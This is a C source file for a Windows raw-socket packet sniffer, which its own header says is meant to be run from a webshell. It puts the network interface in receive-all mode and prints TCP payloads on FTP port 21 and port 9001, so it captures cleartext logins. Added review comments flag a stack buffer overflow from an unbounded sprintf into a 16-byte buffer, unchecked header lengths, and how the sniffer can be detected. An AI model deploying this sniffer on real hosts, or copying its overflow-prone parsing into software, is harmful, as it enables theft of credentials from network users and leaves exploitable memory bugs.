/*------------------------------------------------------
 *file:   SnifferFtp.c
 *Effect: for sniffing experiments run from a webshell, based on raw sockets
 *Code:   Huai_Huai
 *Page:   Http://hhuai.cn
 *Date:   2006.1.12
 *
 * Overview: opens an AF_INET/SOCK_RAW socket, binds it to the first
 * address the local host name resolves to, switches it to receive-all
 * mode with SIO_RCVALL, then loops over received packets and prints the
 * TCP payload of any segment whose source or destination port is 21 or
 * 9001.
 *
 * NOTE(review): the header parsing below trusts every length field in
 * the captured packet and formats into a 16-byte stack buffer; see the
 * notes in main().
 * NOTE(review): from a monitoring point of view the observable behaviour
 * is a process that creates a raw IP socket and issues SIO_RCVALL, which
 * on Windows requires administrator rights. What it prints is traffic
 * that crosses the wire unencrypted.
 *-----------------------------------------------------*/
#include   /* header name lost in page extraction; presumably a standard header -- confirm against the original file */
#include   /* header name lost in page extraction -- confirm against the original file */
#include "Winsock2.h"
#pragma comment(lib,"WS2_32.lib")

#define SIO_RCVALL _WSAIOW(IOC_VENDOR,1)   /* ioctl code passed to WSAIoctl() in startsniffer() */
#define STATUS_FAILED 0xFFFF               /* not referenced in this file */
#define MAX_PACK_LEN 65535                 /* size of the (unused) buffer in startsniffer() */
#define MAX_ADDR_LEN 16                    /* not referenced in this file */
#define MAX_HOSTNAME_LEN 255               /* size of the host-name buffer */

// IP header definition.
// Every member is a byte or byte array, and main() overlays this struct
// directly on the receive buffer.
typedef struct _iphdr
{
    byte ver_len;        // version (4 bits), header length (4 bits); header length is counted in 32-bit units
    byte type;           // type, 8 bits
    byte length[2];      // total length, 16 bits: total length of the datagram in bytes
                         // a datagram may not exceed 65536 bytes, otherwise it is considered corrupted
    byte id[2];          // datagram identification, used when there is more than one datagram, 16 bits
    byte flag_offset[2]; // flags, 3 bits; fragment offset, 13 bits
    byte time;           // time to live, 8 bits
    byte protocol;       // protocol, 8 bits
    byte crc_val[2];     // header checksum, 16 bits
    byte src_addr[4];    // source address, 32 bits
    byte tar_addr[4];    // destination address, 32 bits
    byte options[4];     // options and padding, 32 bits
}IP_HEADER;

// TCP header definition, overlaid on the receive buffer in main().
typedef struct _tcphdr
{
    byte source_port[2];            // sender port number, 16 bits
    byte dest_port[2];              // receiver port number, 16 bits
    byte sequence_no[4];            // 32 bits; position of this segment's data within the overall byte stream
    byte ack_no[4];                 // 32 bits, acknowledgement number: how much of the sender's data the receiver has received
    unsigned char offset_reser_con; // data offset 4 bits, reserved 6 bits, control bits 6 (this byte holds the first 8 of those bits)
    unsigned char th_flag;          // remaining flag bits
    byte window[2];                 // window, 16 bits
    byte checksum[2];               // checksum, 16 bits
    byte urgen_pointer[2];          // 16 bits, urgent data pointer
    byte options[3];                // options and padding, 32 bits
                                    // NOTE(review): declared as 3 bytes although the comment says 32 bits
}TCP_HEADER;

// IP protocol numbers. Only PROTOCOL_TCP is used by live code;
// PROTOCOL_ICMP and PROTOCOL_UDP appear in the disabled switch in main().
#define PROTOCOL_ICMP 1            // ICMP (the original comment mislabelled this "Transmission Control Protocol")
#define PROTOCOL_GTG 3             //Gateway-to-Gateway
#define PROTOCOL_CGMM 4            //CMCC Gateway Monitoring Message
#define PROTOCOL_ST 5              //ST
#define PROTOCOL_TCP 6             // Transmission Control Protocol
#define PROTOCOL_UCL 7             //UCL
#define PROTOCOL_SECURE 9          //secure
#define PROTOCOL_BRM 10            //BBN RCC Monitoring
#define PROTOCOL_NVP 11            //NVp
#define PROTOCOL_PUP 12            //PUP
#define PROTOCOL_PLURIBUS 13       //Pluribus
#define PROTOCOL_TELENET 14        //Telenet
#define PROTOCOL_XNET 15           //XNET
#define PROTOCOL_CHAOS 16          //Chaos
#define PROTOCOL_UDP 17            //UDP
#define PROTOCOL_MULTIPLEXING 18   //Multiplexing
#define PROTOCOL_DCN 19            //DCN
#define PROTOCOL_TAC_MONITORING 20 //TAC Monitoring
#define PROTOCOL_ALN 63            //any local network
#define PROTOCOL_SATNET 64         //SATNET and Backroom EXPAK
#define PROTOCOL_MITSS 65          //MIT Subnet Support
#define PROTOCOL_SATNET_MONIT 69   //SATNET Monitoring
#define PROTOCOL_IPCU 71           //Internet Packet Core Utility
#define PROTOCOL_BK_SATNET_MONI 76 //Backroom SATNET Monitoring
#define PROTOCOL_WIDEBAND_MONI 78  //WIDEBAND Monitoring
#define PROTOCOL_WIDEBAND_EXPAK 79 //WIDEBAND EXPAK

// Raw socket shared by startsniffer() (creates it) and ReceiveBuf() (reads from it).
SOCKET SocketRaw;

/*
 * Initialise Winsock, create the raw socket in SocketRaw, bind it to the
 * first address of the local host and enable SIO_RCVALL on it.
 *
 * Takes no arguments and returns nothing; on any checked failure it
 * prints a message and calls exit(0).
 *
 * NOTE(review): exit(0) reports success to the parent process even on
 * the failure paths, and WSACleanup() is never called.
 */
void startsniffer()
{
    char RecvBuf[MAX_PACK_LEN]={0};  // NOTE(review): never used in this function; ~64 KB of stack zeroed for nothing
    char FAR name[MAX_HOSTNAME_LEN];
    WSADATA wsa;
    struct hostent FAR* pHostent;
    SOCKADDR_IN sa;
    DWORD OutBuffer[10];
    DWORD InBuffer=1;                // option value handed to SIO_RCVALL (1 = turn receive-all on)
    DWORD BytesReturned=0;

    if(WSAStartup(MAKEWORD(2,2),&wsa)!=0)
    {
        printf("不能加载Winsock DLL!");   // message text: "Cannot load the Winsock DLL!"
        exit(0);
    }
    SocketRaw=socket(AF_INET,SOCK_RAW,IPPROTO_IP);
    if(SocketRaw==INVALID_SOCKET)
    {
        printf("不能创建Socket!");        // message text: "Cannot create the socket!"
        exit(0);
    }

    // NOTE(review): return value ignored; on failure `name` is uninitialised
    // when it is handed to gethostbyname().
    gethostname(name,MAX_HOSTNAME_LEN);

    // memory is allocated automatically here (the hostent is owned by Winsock)
    // NOTE(review): the result is not checked for NULL before the memcpy below
    // dereferences it.
    pHostent=gethostbyname(name);

    sa.sin_family=AF_INET;
    sa.sin_port=htons(6000);         // presumably irrelevant for a raw IPPROTO_IP socket -- confirm
    // NOTE(review): copies h_length bytes into the 4-byte S_addr; assumes the
    // resolver returned an IPv4 address (h_length == 4) -- not verified here.
    memcpy(&sa.sin_addr.S_un.S_addr,pHostent->h_addr_list[0],
        pHostent->h_length);
    if(bind(SocketRaw,(PSOCKADDR)&sa,sizeof(sa))!=0)
    {
        printf("不能绑定网卡!");          // message text: "Cannot bind the network adapter!"
        closesocket(SocketRaw);
        exit(0);
    }

    // Switch the bound socket to receive-all mode; OutBuffer and
    // BytesReturned are supplied to the call but not read afterwards.
    if(WSAIoctl(SocketRaw,SIO_RCVALL,&InBuffer,sizeof(InBuffer),
        &OutBuffer,sizeof(OutBuffer),&BytesReturned,NULL,NULL)!=0)
    {
        printf("不能创建WSAIoctl!");      // message text: "Cannot create WSAIoctl!"
        closesocket(SocketRaw);
        exit(0);
    }
}

/*
 * Read one chunk from the global raw socket.
 *
 * buf: destination buffer
 * len: capacity of buf in bytes
 * Returns whatever recv() returns, unchanged.
 */
int ReceiveBuf(byte* buf,int len)
{
    return recv(SocketRaw,(char *)buf,len,0);
}

/*
 * Capture loop: start the sniffer, then forever receive a packet, treat
 * the buffer as an IP header followed by a TCP header, and print the TCP
 * payload when either port is 21 or 9001. The loop has no exit path.
 *
 * NOTE(review): `void main` is non-standard; the standard form returns int.
 */
void main()
{
    int len;
    byte RecvBuf[65535];
    char buf[16];                    // scratch buffer for every sprintf() below -- only 16 bytes
    int iphdr_len;
    TCP_HEADER* pTcpHeader;
    unsigned __int16 src_port;
    unsigned __int16 dest_port;
    int HdrLen;
    __int16 datalen;                 // NOTE(review): signed 16-bit; a total length >= 32768 becomes negative
    IP_HEADER* pIpheader;
    int port1,port2;

    startsniffer();
    while(TRUE)
    {
        port1=port2=0;
        // Zeroing the whole buffer each round also guarantees that the "%s"
        // reads below hit a NUL, unless a packet fills all 65535 bytes.
        memset(RecvBuf,0,65535);
        len=ReceiveBuf(RecvBuf,65535);
        if(len>0)
        {
            // The code assumes the received data starts at the IP header.
            // NOTE(review): len is only tested for > 0; nothing checks that it
            // covers a full IP header, let alone the TCP header read below.
            pIpheader=(IP_HEADER*)RecvBuf;
            // Disabled debug output that named the protocol of each packet.
            /*
            switch(pIpheader->protocol)
            {
            case PROTOCOL_ICMP: printf("ICMP"); break;
            case PROTOCOL_TCP: printf("TCP"); break;
            case PROTOCOL_UDP: printf("UDP"); break;
            default: printf("其他协议"); break;
            }
            */
            if(pIpheader->protocol==PROTOCOL_TCP)
            {
                // Low nibble of ver_len is the header length in 32-bit words.
                // NOTE(review): not validated (minimum of 5 words, or against len);
                // a short packet makes the TCP fields come from the zeroed
                // remainder of RecvBuf.
                iphdr_len=(pIpheader->ver_len&0xf)*4;
                pTcpHeader=(TCP_HEADER*)(RecvBuf+iphdr_len);
                // Ports are assembled by hand from two network-order bytes.
                src_port=pTcpHeader->source_port[0]
                    *0x100+pTcpHeader->source_port[1];
                dest_port=pTcpHeader->dest_port[0]
                    *0x100+pTcpHeader->dest_port[1];
                // The formatted port strings are never used (the printf calls
                // are commented out); only port1/port2 matter below.
                memset(buf,0,16);
                sprintf(buf,"%d",src_port);
                port1=src_port;
                //printf("%s ",buf);
                memset(buf,0,16);
                sprintf(buf,"%d",dest_port);
                port2=dest_port;
                //printf("%s ",buf);
                // 21 is the FTP control port; the purpose of 9001 is not stated
                // in this file.
                if(port1==21 || port2==21 || port1==9001 || port2==9001)
                {
                    // NOTE(review): >>2 equals data-offset*4 only when the low four
                    // bits of this byte are zero; otherwise the payload pointer is
                    // off by up to 3 bytes. The result is also not checked against len.
                    HdrLen=(pTcpHeader->offset_reser_con)>>2;
                    memset(buf,0,16);
                    // NOTE(review): stack buffer overflow -- the payload is copied
                    // with "%s" into the 16-byte buf with no length limit, so any
                    // payload of 16 bytes or more writes past the end of buf.
                    sprintf(buf,"%s",((BYTE *)pTcpHeader)+HdrLen);
                    //printf("%s ",buf);
                    // Dotted-quad source address: at most 15 characters plus NUL,
                    // which exactly fits buf. Result unused.
                    memset(buf,0,16);
                    sprintf(buf,"%d.%d.%d.%d",pIpheader->src_addr[0],
                        pIpheader->src_addr[1],pIpheader->src_addr[2],
                        pIpheader->src_addr[3]);
                    //printf("%s ",buf);
                    // Dotted-quad destination address. Result unused.
                    memset(buf,0,16);
                    sprintf(buf,"%d.%d.%d.%d",pIpheader->tar_addr[0],
                        pIpheader->tar_addr[1],pIpheader->tar_addr[2],
                        pIpheader->tar_addr[3]);
                    //printf("%s ",buf);
                    // IP total length, assembled from two bytes. Formatted but
                    // never used, and never compared with len.
                    datalen=pIpheader->length[0]
                        *0x100+pIpheader->length[1];
                    memset(buf,0,16);
                    sprintf(buf,"%d",datalen);
                    //printf("%s ",buf);
                    // Same computation and same unbounded copy as above; this
                    // is the copy that is actually printed.
                    HdrLen=(pTcpHeader->offset_reser_con)>>2;
                    memset(buf,0,16);
                    sprintf(buf,"%s",((BYTE *)pTcpHeader)+HdrLen);
                    // The payload is printed as a C string, so output stops at
                    // the first NUL byte.
                    printf("%s",buf);
                    //printf("\n");
                }
            }
        }
    }
}